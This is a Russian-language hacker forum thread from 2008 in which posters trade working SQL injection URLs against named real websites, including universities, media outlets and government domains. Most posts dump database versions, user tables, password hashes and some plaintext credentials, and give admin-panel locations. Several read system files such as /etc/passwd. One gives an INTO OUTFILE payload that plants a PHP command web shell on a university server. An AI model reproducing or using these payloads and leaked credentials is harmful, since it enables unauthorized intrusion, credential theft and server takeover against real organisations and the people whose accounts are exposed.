Просмотр полной версии : SQL Инъекции
RBC.ua - РБК Украина - PR 5
мой любимый способ вывода - в .txt
http://marketing.rbc.ua/file.php?id=99999+union+select+concat_ws(0x3a,user ,password),2,3+from+mysql.user/*
root: а пасса поидее нету ;)
шелл не зальеш ( фильтруются кавычки..
теперь пойдем по субдомменах..
http://marketing.rbc.ua/file.php?id=99999+union+select+concat_ws(0x3a,logi n,pass),2,3+from+presscenter.sys_user/*
Press.rbc.ua/admin/
admin;5660511
http://marketing.rbc.ua/file.php?id=99999+union+select+concat_ws(0x3a,logi n,pass),2,3+from+radio.sys_user/*
Radio.rbc.ua/admin/
admin;5660511
http://marketing.rbc.ua/file.php?id=99999+union+select+concat_ws(0x3a,logi n,password),2,3+from+rbc_research.rbc_users/*
Research.rbc.ua
shultz:shultz
бд большая - рут. найти можно много интересного..
Pogoda.ua- PR 4
http://www.pogoda.ua/index.php?id=999999+union+select+1,concat_ws(0x3a, version(),user(),database()),3,4,5/*
увы 4 мускул. хехе угадал табличку.....
http://www.pogoda.ua/index.php?id=999999+union+select+1,concat_ws(0x3a, login,password),3,4,5+from+users/*
InnovateOnline.info - PR 6
http://innovateonline.info/index.php?view=article&id=9999999+union+select+1,concat_ws(0x3a,password) +from+innovate.person_account/*
пассы...
http://innovateonline.info/index.php?view=article&id=9999999+union+select+1,concat_ws(0x3a,email)+fr om+innovate.person/*
мыла...
http://innovateonline.info/index.php?view=article&id=9999999+union+select+1,concat_ws(0x3a,user_logi n,user_pass)+from+innovate_jobs.wp_users/*
WP - токо где он ?
пс: второй домен webhost.fgsweb.fgsehs.nova.edu ;)
Effective.net.ua
http://www.effective.net.ua/show_obj.php?a=-1+union+select+1,2,3,4,5,6,7,version(),9,10,11,12, 13,14,15,16,17/*
Ekip.com.ua
http://ekip.com.ua/index.php?id=623+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15--
вывод необнаружен..(
2la.painkiller
15.07.2008, 10:43
Хотел доработать
http://www.stumptuous.com/cms/
админку не могу найти =) поскажите плиз
http://www.mdiecast.com/manufacturerinfo.php?manname=99999+union+select+1, 2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
попробуйте подобрать поля с паролями.. оч нужно
2la.painkiller
15.07.2008, 12:09
http://www.mdiecast.com/manufacturerinfo.php?manname=-1+order+by+15
15 штук
4.1.22-standard
удачи
+)
http://www.hyoro.net/Azur/ - Люди ента кп подается мускл???? Чтото странное какието ошибки внизу и по бокам!!! Посмарите плиз!!!
beerhack
15.07.2008, 12:33
http://www.terrorfreetomorrow.org/articlenav.php?id=-9999+union+select+1,2,3,4,5,6*
VERSION: 5.0.45-log
passwords
---username
---upassword
---emailaddress
---securitylevel
ahutomo:22261f196a56676d:ahutomo@terrorfreetomorro w.org:1
**************************************
http://www.samarmagazine.org/archive/article.php?id=-99999+union+select+1,2,3,4,5,6,version(),8,9,10,11 ,12,13,14,15/*
VERSION: 5.0.24a-standard-log
**************************************
http://www.eatmybrains.com/showfeature.php?id=-99999+union+select+1,2,3,version(),5,6,7,8,9,10,11 ,12,13,14,15,16/*
VERSION: 4.1.22-standard
http://www.hyoro.net/Azur/ - Люди ента кп подается мускл???? Чтото странное какието ошибки внизу и по бокам!!! Посмарите плиз!!!
закончилось место для хостинга
EDU
http://rice-evolution.cornell.edu/riceevol-experiment.php?div_eid=3
юзаем лимит ;-)
Db Ver: 5.0.21-log
Db name: riceevol2
User: rice-evol@localhost
http://www.mdiecast.com/manufacturerinfo.php?manname=99999+union+select+1, 2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
попробуйте подобрать поля с паролями.. оч нужно
Поле с паролем не нашёл но нашёл таблицу с акками:
_http://www.mdiecast.com/manufacturerinfo.php?manname=-1+union+select+1,login,3,4,5,6,7,8,9,10,11,version (),13,14,15+from+accounts+limit+0,1/*
Ща покопаюсь дальше!
Есть форум ipb http://www.forum.mdiecast.com/ но база скорее всего другая и с ipb_members не читает((
http://www.mdiecast.com/manufacturerinfo.php?manname=99999+union+select+1, 2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
попробуйте подобрать поля с паролями.. оч нужно
http://www.mdiecast.com/manufacturerinfo.php?manname=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,id,login ,email),8,9,10,11,12,13,14,15+from+accounts+limit+ 0,1/*
Не хватает только пасса, пока ничего не придумаю...
beerhack
15.07.2008, 15:06
http://www.musicdsp.org/showone.php?id=-99999+union+select+1,version(),3/*
VERSION: 4.0.27-standard
******************************************
http://www.cichlidae.com/article.php?id=-99999+union+select+1,2,3,4,5,6,7,version(),9,10,11 ,12,13,14,15,16,17,18,19,20/*
VERSION: 4.1.20-log
******************************************
http://www.readingmatters.co.uk/book2.php?id=-99999+union+select+1,2,version(),4,5,6,7,8,9/*
VERSION: 5.0.45-community-log
******************************************
http://www.londyn.sk/agenturaf.php?ID=-99999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,table_name,35,36+from+information_schema .tables/*
VERSION: 5.0.22
_Pantera_
15.07.2008, 17:54
http://www.pestworks.com.au/index.php?id=-2+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24/*
2la.painkiller
15.07.2008, 17:57
Хотел доработать
http://www.stumptuous.com/cms/
админку не могу найти =) поскажите плиз
.Begemot.
15.07.2008, 18:28
Хотел доработать http://www.stumptuous.com/cms/ админку не могу найти =) поскажите плиз
Вот что нашел -
http://www.stumptuous.com/gallery2/main.php?g2_view=core.UserAdmin&g2_subView=core.UserLogin&g2_return=main.php%3F&&g2_returnName=album
Files.exe.org.ua
http://files.exe.org.ua/download.php?id=999999999999'+union+select+1,2,3,4 ,5,6/*
без вывода ?
http://files.exe.org.ua/complete.php?id=Yot37NTTxtBkItyIqcum'%20union%20se lect%201,2,3,4,5,6,7/*
что кто думает ?
http://files.exe.org.ua/success.php?id=508888888888888'+union+select+passw ord+from+mysql.user/*
Climb.com.ua
http://www.climb.com.ua/aboutbook.php?id=-1+union+select+1,version(),3,4,5,6--
Roxo.kiev.ua
http://roxo.kiev.ua/showarticle.php?id=-1+union+select+1,version(),3,4,5,6/*
Food.a.ua
http://food.a.ua/article.php?id=1918+union+select+version()/*
Alltxt.org.ua
http://alltxt.org.ua/article.php?id=242+union+select+version()/*
Viptravel.com.ua
http://viptravel.com.ua/index.php?id=3696&show=4nalbum&do=showgall&gid=3742+union+select+1,2,3,4,5,6,version(),8--
otmorozok428
15.07.2008, 21:27
www.docka.irkutskcar.ru
http://www.docka.irkutskcar.ru/index.php?cat=176+union+select+1,version(),user(), 4,5--
VERSION(): 5.0.51a-community-log
USER(): irkutskc_bkv@localhost
DATABASE(): irkutskc_doska
Список таблиц-столбцов:
*******************************
wzb_cat
-------------------------------
cat
name
parent
count_items
description
picture
total_items
*******************************
wzb_details
-------------------------------
action
avtor
cat
city
cpo
date
description
details
email
exp_date
ip
name
period
phone
photo
picture
pwd
thumbnail
title
url
view
*******************************
wzb_wish
-------------------------------
ids
nums
*******************************
Вывести список юзеров с паролями:
http://www.docka.irkutskcar.ru/index.php?cat=176+union+select+1,avtor,pwd,4,5+fro m+wzb_details--
Админка:
http://www.docka.irkutskcar.ru/admin/
EDU
http://www.si.umich.edu/lila/artifacts/bigimage.phtml?images_id=-58
таблицы не подобрал, влом было долго копаться.
Database Version: 4.0.13
Database name: lila
User name: lila@harvbannister.si.umich.edu
otmorozok428
16.07.2008, 00:42
Всероссийская Ипотечная Сеть НБИК
http://www.nib-nbik.ru/?alias=show&id=269'
http://www.nib-nbik.ru/?alias=show&id=269+AND+1%3Cascii(substring((version()),1,1))
DATABASE(): lipnbikr_spb
http://www.lip-nbik.ru/?alias=show&id=260'
http://www.lip-nbik.ru/?alias=show&id=260+AND+1%3Cascii(substring((version()),1,1))
DATABASE(): lipnbikr_lipetck
http://www.invest-nbik.ru/?alias=show&id=273'
http://www.invest-nbik.ru/?alias=show&id=273+AND+1%3Cascii(substring((version()),1,1))
DATABASE(): lipnbikr_kursk
http://www.sirius-nbik.ru/?alias=show&id=262'
http://www.sirius-nbik.ru/?alias=show&id=262+AND+1%3Cascii(substring((version()),1,1))
DATABASE(): lipnbikr_sirius
Одинаковые для всех сайтов:
VERSION(): 5.0.51a-community-log
USER(): lipnbikr_sergio@localhost
~!DoK_tOR!~
16.07.2008, 01:33
что кто думает ?
Цитата:http://files.exe.org.ua/success.php?id=508888888888888'+union+select+passw ord+from+mysql.user/*
kove:1b56bddf16637238
kiriliuk:1b56bddf16637238
надо тему Антибояна важной сделать,а то так не удобно
-----------------------------------------------------------------
http://www.ccre.org/champs_activites_detail_news_en.htm?ID=963&idca=-3115+union+select+1,2,3,4,5,6,table_name,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1+from+information_schema.tables+ limit+17,11/*
Блин,Все таблицы:
T_1005,T_1006,T_1007...итд
http://www.jezuk.co.uk/cgi-bin/view/arabica/log?id=-3591+union+select+1,2,3,4,5,6,7/*
--------------------------------------------------------------
http://tjp.dergisi.org/text.php3?id=-362+union+select+1,2,3,version(),5,6,7,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/*
4 version
~!DoK_tOR!~
16.07.2008, 02:37
надо тему Антибояна важной сделать,а то так не удобно
-----------------------------------------------------------------
http://www.ccre.org/champs_activites_detail_news_en.htm?ID=963&idca=-3115+union+select+1,2,3,4,5,6,table_name,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1+from+information_schema.tables+ limit+17,11/*
Блин,Все таблицы:
T_1005,T_1006,T_1007...итд
http://www.jezuk.co.uk/cgi-bin/view/arabica/log?id=-3591+union+select+1,2,3,4,5,6,7/*
///
http://www.jezuk.co.uk/cgi-bin/view/arabica/log?id=-1+union+select+1,2,3,4,concat_ws(0x3a,name,passwor d,email),6,7+from+users/*
пассы зашифрованы в DES )
сегодня у нас .RU
Koleso.Topof.ru - Информационный Ресурс о шинах, тесты шин - PR 4
http://koleso.topof.ru/testing_info.php?id=999999+union+select+1,2,concat _ws(0x3a,admin_login,admin_password),4,5,6,7+from+ admins/*
topof:33d51f16ddaf72afb581e2a223c602a1 < 4f***...
http://koleso.topof.ru/testing_info.php?id=999999+union+select+1,2,unhex( hex(concat_ws(0x3a,username,user_password))),4,5,6 ,7+from+lotus_users+limit+1,1--
admin:6a8da7a52d4684cc61ee8ed6bcc25f06 < 00d9a26f
Mtas.ru - PR 4
http://www.mtas.ru/second.php?ID=-1+union+select+concat_ws(0x3a,vcLogin,vcPassword)+ from+tadmins+limit+4,1/*
админка (http://forum.antichat.ru/showpost.php?p=774644&postcount=527)
Teatrdoc.ru - PR 4
http://www.teatrdoc.ru/plays.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5--
Viperson.ru - PR 4
http://www.viperson.ru/wind.php?ID=-1+union+select+version()/*
Game-ost.ru - PR 4
http://www.game-ost.ru/info.php?id=999999999+union+select+1,2,version(),4 ,5,6,7,8,9/*
Fondsk.ru - PR 4
http://www.fondsk.ru/article.php?id=9999999+union+select+unhex(hex(tabl e_name)),2+from+information_schema.tables+limit+24 ,1/*
Flirtanica.ru - PR 4
http://www.flirtanica.ru/articles1.php?id=9999999+union+select+1,concat_ws( 0x3a,version(),user(),database()),3,4,5/*
MaSTeR GэN
16.07.2008, 12:18
http://www.rjb.csic.es/fichacurso.php?id=265
усе на мой взляд сделать тут больше не чего нельзя ( mysql 3 версии filepriv нема вообшем пусть будет для комплекта )
version()=3.23.58
user()=batonico@telperion.csic.es
database()=batonico
otmorozok428
16.07.2008, 16:36
Издательство Форум Медиа
http://www.forum-media.ru/blank.php?print_done=111&oid=4975'
http://www.forum-media.ru/blank.php?print_done=111&oid=4975+union+select+null,null,null,null,null--
http://www.forum-media.ru/blank.php?print_done=111&oid=4975+union+select+null,current_database(),null ,null,null--
http://www.forum-media.ru/blank.php?print_done=111&oid=4975+union+select+null,version(),null,null,nul l--
http://www.forum-media.ru/blank.php?print_done=111&oid=4975+union+select+null,current_user,null,null, null--
VERSION(): PostgreSQL 7.4.19 on i686-redhat-linux-gnu, compiled by GCC gcc (GCC) 3.4.6 20060404 (Red Hat 3.4.6-9)
CURRENT_DATABASE(): forummed_forummed
CURRENT_USER: forummed
Список таблиц:
applicable_roles
check_constraints
column_domain_usage
column_privileges
columns
column_udt_usage
constraint_column_usage
constraint_table_usage
data_type_privileges
docfiles
domain_constraints
domains
domain_udt_usage
element_types
enabled_roles
forumbusket
forumnews
forumorders
forumusers
information_schema_catalog_name
key_column_usage
parameters
partners
pg_aggregate
pg_am
pg_amop
pg_amproc
pg_attrdef
pg_attribute
pg_cast
pg_class
pg_constraint
pg_conversion
pg_database
pg_depend
pg_description
pg_group
pg_index
pg_indexes
pg_inherits
pg_language
pg_largeobject
pg_listener
pg_locks
pg_namespace
pg_opclass
pg_operator
pg_proc
pg_rewrite
pg_rules
pg_settings
pg_stat_activity
pg_stat_all_indexes
pg_stat_all_tables
pg_stat_database
pg_statio_all_indexes
pg_statio_all_sequences
pg_statio_all_tables
pg_statio_sys_indexes
pg_statio_sys_sequences
pg_statio_sys_tables
pg_statio_user_indexes
pg_statio_user_sequences
pg_statio_user_tables
pg_stats
pg_stat_sys_indexes
pg_stat_sys_tables
pg_stat_user_indexes
pg_stat_user_tables
pg_tables
pg_trigger
pg_type
pg_user
pg_views
referential_constraints
role_column_grants
role_routine_grants
role_table_grants
role_usage_grants
routine_privileges
routines
rubr_section
schemata
secpasswd
sendsubs
spravochniks
sql_features
sql_implementation_info
sql_languages
sql_packages
sql_sizing
sql_sizing_profiles
stats
table_constraints
table_privileges
tables
triggered_update_columns
triggers
usage_privileges
view_column_usage
views
view_table_usage
voting1
voting2
Столбцы:
*************************************
docfiles
-------------------------------------
name
namefile
spr_id
*************************************
forumbusket
-------------------------------------
orderid
productid
qua
*************************************
forumnews
-------------------------------------
id
news
odate
stat
topic
*************************************
forumorders
-------------------------------------
cdate
id
ips
refer
uid
*************************************
forumusers
-------------------------------------
codefax
codephone
email
fax
fio
firm
id
inn
kpp
login
numb
passwd
persons
phone
region
street
subs
subs_1
subs_2
subs_3
subs_4
to_do
uraddress
zip
*************************************
partners
-------------------------------------
id
name
refer
*************************************
rubr_section
-------------------------------------
numb
rubr
sec_file
section
stat
*************************************
secpasswd
-------------------------------------
cid
files
passwd
*************************************
sendsubs
-------------------------------------
cdate
status
substext
theme
*************************************
spravochniks
-------------------------------------
aname
aname2
anno
cid
compl
isbn
name
oglav
pages
period
pict
price
stat
types
*************************************
voting1
-------------------------------------
address
bezprod1
bezprod2
bezprod3
businesslike
contactgood
convenient
deliver
email
fax
fio
friendly
helpfull
highquality
id
kritik
not_importunate
operat
phone
practical
uident
useful
valueformoney
*************************************
voting2
-------------------------------------
address
bezprod1
bezprod2
bezprod3
businesslike
contactgood
convenient
deliver
email
fax
fio
friendly
helpfull
highquality
id
kritik
not_importunate
operat
phone
practical
uident
useful
valueformoney
*************************************
Выведем список юзеров:
http://www.forum-media.ru/blank.php?print_done=111&oid=4975+union+select+id,login,null,passwd,null+fr om+forumusers--
Выведем коды для доступа к зоне обновлений:
http://www.forum-media.ru/blank.php?print_done=111&oid=4975+union+select+cid,files,null,passwd,null+f rom+secpasswd--
Страница обновлений находится здесь:
http://www.forum-media.ru/takebonus.php
Дополнительные материалы к справочнику "ISO 9001": 267294
Дополнительные материалы к справочнику "Ответственность генерального директора": 464724
Дополнительные материалы к справочнику "Новое в Трудовом законодательстве": 167647
Дополнительные материалы к справочнику "Государственный и муниципальный заказ": 220665
Так же обновления безо всяких заморочек можно скачать отсюда:
http://www.forum-media.ru/doc/bonus/1000/
http://www.forum-media.ru/doc/bonus/1001/
Просто интересная папка, доступная для просмотра:
http://www.forum-media.ru/includs/
Админка:
http://www.forum-media.ru/admin
Imperou$
16.07.2008, 17:18
http://www.monsun-biz.com/auctiondetails.php?id=-101462'+union+select+concat_ws(0x3A3a,id,username, password,created,lastlogin,level)+from+probid_admi ns/*
http://www.monsun-biz.com/admin/login.php админка
admin::a8954ce2b9264ae3a1e80e8f3cc211dc ::nitesH
Кавычки не экранируются. Можно попробовать залить шелл.
http://www.keylinedesigns.com/hosting.php?id=-5+union+select+version()/*
http://admin.keylinedesigns.com/
5.0.45-log
adminUser
-tbenson::*77EF3F8AA5E975577A3372CF87C8450F560F608C :: Jackass00
Fm.gov.lv - PR 6
http://www.fm.gov.lv/index.php?id=-1+union+select+version()/*
mysql 4 - определил по ошибке information_schema.tables
к mysql.user access denied
http://www.fm.gov.lv/index.php?id=-1+union+select+concat_ws(0x3a,username,password)+f rom+users/*
поидее есть такая колонка..
Biodiversityscotland.gov.uk - PR 5
http://www.biodiversityscotland.gov.uk/pageType2.php?id=35&type=2&navID=-92+union+select+unhex(hex(version())),2,3,4,5,6/*
mysql 4 - определил по ошибке information_schema.tables
Chuvprok.gov.ru - Прокуратура ЧП - PR 4
http://www.chuvprok.gov.ru/news.php?id=99999+union+select+1,version(),3,4,5--
EDU
http://www.de.pdx.edu/webct/info.php?page=50+order+by+3/*
вывод слева в меню
file_priv=0 ((
DB`s:
cavsdb
hdkb
irsweb
-> users
Version: 5.0.37
Dbname: irsweb
Username: cavsdb_dummy@bestla.oit.pdx.edu
Tuba.gov.tr - PR 6
http://www.tuba.gov.tr/index.php?id=99999999'+union+select+unhex(hex(tabl e_name))+from+information_schema.tables+limit+39,1/*
5 ветка, смотрим таблицы
http://www.tuba.gov.tr/index.php?id=99999999'+union+select+unhex(hex(colu mn_name))+from+information_schema.columns+where+ta ble_name=0x745f6c6f67696e+limit+0,1/*
достаем колонки из нужной таблы..
http://www.tuba.gov.tr/index.php?id=99999999'+union+select+unhex(hex(conc at_ws(0x3a,username,password)))+from+db_tuba.t_log in/*
достаем данные..)
admin:f1aacbce49efbd4edec3116379e28aae
Armagh.gov.uk - PR 5
http://www.armagh.gov.uk/news_item.php?id=99999999'+union+select+1,concat(0 x20,version(),0x2020202020202020a9206861636b656420 627920564954414c),3,4,5,6/*
GG.gov.au - PR 5
http://www.gg.gov.au/governorgeneral/content.php?id=-25+union+select+1,2,unhex(hex(version())),4,5,6,7, 8,9,10,11,12,13/*
aka PSIH
16.07.2008, 21:11
carthage.edu - PR7
http://www.carthage.edu/admissions/life/clubs.cfm?org=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
user() - wwwrun@localhost
version() - 5.0.22-log
databse() - handbook
cofc.edu - PR7
http://www.cofc.edu/music/events/main.php?id=-1+union+select+1,2,3,4,5,6,7,8,9/*
user() - sota@localhost
version() - 4.1.20
databse() - sota
alum.chatham.edu - PR6
http://alum.chatham.edu/alumni/get_gallery.cfm?ID=@@version--
system_user - webuser
db_name() - Alumnae
disability.tamu.edu - PR6
http://disability.tamu.edu/accessresult.asp?bldgnum=@@version--
system_user - casemanweb
db_name() - CaseMan
ccis.edu - PR6
http://www.ccis.edu/newsroom/?Story=1'+or+1=@@version--
system_user - ccweb
db_name() - News
http://www.gut.dloadshop.com/GUSTORecords/shop.asp?AID=308'
Mbda.gov - PR 8
http://www.mbda.gov/index.php?action=faq&id=999999%2527+union+select+unhex(hex(version()))/*&mode=viewfaq
помогите разкурить..)
Ltgov.state.tx.us - PR 6
http://www.ltgov.state.tx.us/prview.php?id=191'+union+select+1,table_name,3,4,5 ,6,7,8,9+from+information_schema.tables+limit+47,1/*
Tangodata.gov.ar - PR 5
http://www.tangodata.gov.ar/home_noticias_listado.php?id=99999999+union+select +1,version(),3,4,5,6,7/*
Ingushetiya.ru - Ингушетия.ру - PR 5
http://www.ingushetiya.ru/dictionary/?text=-63'+union+select+table_name,table_schema+from+info rmation_schema.tables/*
Riocuarto.gov.ar - PR 4
http://www.riocuarto.gov.ar/institucional.php?id=99999+union+select+1,version( ),3,4,5,6/*
http://www.riocuarto.gov.ar/institucional.php?id=99999+union+select+1,concat_w s(0x3a,user,password),3,4,5,6+from+mysql.user/*
root:5b3f24b703c68ff2
aka PSIH - carthage.edu
http://www.carthage.edu/admissions/life/clubs.cfm?org=-1+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7,8,9,10,11+from+alumnicollege.auth_user/*
http://www.carthage.edu/admissions/life/clubs.cfm?org=-1+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7,8,9,10,11+from+alumni.login/*
http://www.carthage.edu/admissions/life/clubs.cfm?org=-1+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7,8,9,10,11+from+alumniapps.auth_user/*
http://www.carthage.edu/admissions/life/clubs.cfm?org=-1+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7,8,9,10,11+from+athletics.login/*
http://www.carthage.edu/admissions/life/clubs.cfm?org=-1+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7,8,9,10,11+from+400apply.login/*
http://www.carthage.edu/admissions/life/clubs.cfm?org=-1+union+select+1,2,concat_ws(0x3a,user_login,user_ pass),4,5,6,7,8,9,10,11+from+110club.wp_users/*
http://www.carthage.edu/admissions/life/clubs.cfm?org=-1+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7,8,9,10,11+from+ACTapps.applications/*
кароч почти полный доступ к универу)) там еще много колонок с паролями..
MaSTeR GэN
16.07.2008, 22:12
хм опять какая то бесполезная иньекция )))
sitiodeletras.com
http://www.sitiodeletras.com/mostrar.php?lid=26228 (http://www.sitiodeletras.com/mostrar.php?lid=26228 )
Database Version: 5.0.41-community
Database name: sitiodl_letras
User name: sitiodl_letras@localhost
cодержимое INFORMATION_SCHEMA.tables
_artistas
1 aid
2 nombre
_canciones
1 lid
2 aid
3 did
4 artista
5 titulo
6 disco
7 letra
8 referencia
9 nick
10 comentarios
11 timestamp
12 activo
table _discos
1 did
2 nombre
badlyrics
1 artista
2 titulo
3 disco
4 timestamp
5 ip
6 referer
7 status
known_as
1 inputname
2 realname
notfound
1 creiterio
2 texto
3 timestamp
4 ip
5 estado
status
1 value
2 descripcion
BlackSun
17.07.2008, 15:27
http://www.lilyandlotus.com/pages/set.php?id=-1/**/union/**/select/**/0,1,concat(user(),char(0),database(),char(0),versi on()),3,4/*
amandamc_lilly@localhost
amandamc_lilly
4.0.27-standard
Забавная скуль:
http://www.hanyawanita.com/sm.php?id=-1/**/union/**/select/**/user()/*
вывод - в адресной строке через редирект))
hanyawan_userilg@localhost
hanyawan_hwilgdb
4.1.22-standard
http://www.eszapopan.com.mx/mapograma/machotes/sm.php?id=-1/**/union/**/select/**/user(),2,3,4,5,6/*
bioalive_shadow@localhost
4.1.22-standard
bioalive_main
otmorozok428
17.07.2008, 16:19
www.kruizmag.ru
http://www.kruizmag.ru/r_card.php?rid=1492+union+select+user(),database() ,3,4,version(),6,7,8,9--
USER(): u51317@10.10.223.216
DATABASE(): u51317_vbp
VERSION(): 5.0.51-log
Таблицы:
adv_descr
article
article_g
article_gt
article_t
banners
boxes
category
category_descr
compr
compr_descr
config
config_g
countries
currency
faq
lang
loadprice
modules
news
news_descr
nopt2prod
noption_descr
noptions
orders
place
prod2cat
product
product_descr
raspisanie
security
send_users
sends
static
static_g
static_gt
static_t
tbanners
vitrina
vitrina_prod
voting
voting_f
_Pantera_
17.07.2008, 20:38
fromthetop.org pr-6
Version() - 5.0.45-community-nt
file_priv = Y
Сервак стоит на винде....
http://www.fromthetop.org/Programs/Performers.cfm?pid=-1+union+select+1,2,load_file(char(67,58,47,98,111, 111,116,46,105,110,105)),4,5,6,7+from+mysql.user/*
http://www.fromthetop.org/Programs/Performers.cfm?pid=-1+union+select+1,2,concat(user,char(58),password), 4,5,6,7+from+mysql.user/*
root:*CF57A666D82A1A6E307947399943403DD93CF490 (sha1)
Choices.edu - PR 6
http://www.choices.edu/resources/detail.php?id=-187+union+select+1,unhex(hex(version())),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26/*
Coastal.edu - PR 5
http://www.coastal.edu/news/story.php?id=1994+union+select+1,version(),3,4,5,6 ,7,8,9,10,11/*
4.. но )
http://www.coastal.edu/news/story.php?id=1994+union+select+1,concat_ws(0x3a,us ername,password),3,4,5,6,7,8,9,10,11+from+users/*
rmatthe:363b122c528f54df4a0446b6bab05515 < j
http://www.coastal.edu/news/story.php?id=1994+union+select+1,concat_ws(0x3a,us er,password),3,4,5,6,7,8,9,10,11+from+mysql.user/*
root:*70994C59F06C06BC6D7AE8284D7B3A0A707F8D67
http://www.coastal.edu/news/story.php?id=1994+union+select+1,concat_ws(0x3a,db ),3,4,5,6,7,8,9,10,11+from+mysql.db+limit+1,1/*
смотрим бд..
http://www.coastal.edu/news/story.php?id=1994+union+select+1,LOAD_FILE(0x2F657 4632F706173737764),3,4,5,6,7,8,9,10,11/*
ктот попробуйте залить шелл..) ато я убегаю..... чтот тип этого:
http://www.coastal.edu/news/story.php?id=1994+union+select+1,'<?php system($_GET['cmd']);?>',3,4,5,6,7,8,9,10,11+from+mysql.user+into+outfile +'/vol2/apache/htdocs/news/vital.php'/*
Irhe.upenn.edu - PR 5
http://www.irhe.upenn.edu/ExpertsDt.php?Id=-1+union+select+table_name,table_schema,user(),vers ion(),0xa920564954414c+from+information_schema.tab les/*
Apps.sais-jhu.edu
http://apps.sais-jhu.edu/faculty_bios/faculty_bio1.php?ID=-61+union+select+1,2,3,4,version(),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24/*
auction.ua
http://auction.ua/sellitem/rpc.php?o=1957+union+select+1,concat(username,char (58),password),3+from+probid_admins/*
auctionua:4c527675e9130ae3a6f0eea1fd9acfe5
http://auction.ua/sellitem/rpc.php?o=1957+union+select+1,concat(username,char (58),password),3+from+probid_users/*
http://www.f1-world.ru/news/news.php3?idnews=-807061930+union+select+1,TABLE_NAME,3,4,5,6,7,8,9, 10,11%20from%20INFORMATION_SCHEMA.TABLES%20limit%2 052,1/*
если не лень то можете продолжить
вот те таблицы, которые я подобрал.
CHARACTER_SETS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
1
2
3
4
a_settings
articles
cards
cmess
cusrs
drvinfo
drvyears
fusers
g10qwe
g10users
g12qwe
g12teams
g12users
g15_parts
g15_teams
g20sessions
g20users
g20vopros
g20vopros_old
g21drivers
g21sessions
g21users
images
imagesections
img2003
messages
mg_news
news
news2001_2007
res2004
res2004m
res2004com
res2004drv
самое интересно, что от сайта есть электронный магаз
http://www.mirf1.ru/
на котором тож имеется дырочка
http://www.mirf1.ru/prview.php3?lnk=61&idp=1167'
version() - 5.0.24
user() - f1world_rw@localhost
database() - f1world
CCC.uga.edu - PR 5
http://www.ccc.uga.edu/member_page.php?id=-8+union+select+1,2,3,4,version(),user(),database() ,8,9,0,11,12,13,14/*
4.0.16
Monitor-nhsft.gov.uk - PR 5
http://www.monitor-nhsft.gov.uk/publications.php?id=-726+union+select+1,table_name,table_schema,4,5,6,7 ,8,9,0,11,12,13,14,15,16,17,18,19+from+information _schema.tables+limit+23,1--
нече интересного в БД не нашел..
Calcutta
18.07.2008, 20:58
http://tehno.allmoskow.ru/site.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24--
Calcutta
18.07.2008, 21:21
http://kadabraabra.info/newslenta.php?men=4573+union+select+1,2,concat_ws( 0x3a,table_name),4,5,6,7+from+information_schema.t ables+limit+0,1--
скорость до сайта ужасная, раскручивать очень долго Х_х
BlackSun
18.07.2008, 21:34
http://www.etc-llibres.com/pg.php?id=1&ic=-1/**/union/**/select/**/concat(user(),char(0),database(),char(0),version() ),2/*
http://www.screenroom.co.uk/php/id.asp?id=1/**/or/**/1=(select%20db_name())--
http://www2.mat.dtu.dk/people/uk.php?id=-1/**/union/**/select/**/1,user()--
Ian.cc - PR 4
http://www.ian.cc/notas/noticias_ian.php?id=-557+union+select+1,2,3,unhex(hex(version())),5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36/*
ucluba.ru
http://afisha.ucluba.ru/viewEvent.php?e=-1+union+select+1,2,3,concat(login,char(58),passwor d),5,6+from+admin_users+limit+0,1/*
Crazy:667788 - логин и пароль админа.
Админка находится по адресу.
http://ucluba.ru/admin.php
_http://ks.intercom.ru/news/?id=-75+union+select+1,2,3,version(),5,6/*
version() - 4.0.17
user() - intercom@localhost
database() - intercom
www.castlerockgc.co.uk pr 3
http://www.castlerockgc.co.uk/index.php?id=-10/**/union/**/select/**/1,2,version(),4/*
4.1.22-standard
EDU
http://ae.msstate.edu/site/pages/department/curriculums.php?q=-5+UNION+SELECT+1,concat_ws(char(58),user(),version (),database()),3/*
Database Version: 4.0.20-max
Database name: ae_webpage
User name: webpage@localhost
побрутил таблицы, ничего не брутанулось обычным словарем.
cms bitrixs
http://www.romantrahtenberg.ru/
http://www.romantrahtenberg.ru/catalog/video/element.php?el_id=-19984+union+select+1,2,3,4,5,6,7,8,9,10,11,version (),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32/*
4.1.20
Подобрать не получилось, (((
~!DoK_tOR!~
21.07.2008, 03:37
cms bitrixs
http://www.romantrahtenberg.ru/
